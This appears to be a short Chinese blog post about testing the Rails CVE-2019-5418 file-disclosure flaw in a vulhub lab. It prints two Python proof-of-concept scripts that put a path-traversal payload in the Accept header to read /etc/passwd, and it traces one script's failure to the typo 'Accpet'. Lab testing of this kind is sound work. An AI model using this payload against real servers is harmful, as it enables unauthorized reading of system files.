小伙伴在测试 https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418 漏洞
写了个payload
根据github的payload能成功读取到/etc/passwd,然后自己写了一个
对比了一下发现,把Accept写成了Accpet。。。
写了个payload
payload= "../../../../../../../../etc/passwd{{"
header = {
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Accept-Encoding": "gzip, deflate",
"Accpet": payload
}
print header
target_url=target+"/robots"
res=util.get_url_response(target_url, method='GET', headers=header, timeout=5)
print res.status_code
if res.status_code==200 and re.search("root:[x*]:0:0:",res.text):
根据github的payload能成功读取到/etc/passwd,然后自己写了一个
import requests
headers = {
"Accept-Encoding": "gzip, deflate",
"Accept": "../../../../../../../../etc/passwd{{",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
r = requests.get("http://xxx:3000/robots", headers = headers)
print r.text
也能成功读取,用wireshark抓包对比了一下发现小伙伴写的Accept没有生效对比了一下发现,把Accept写成了Accpet。。。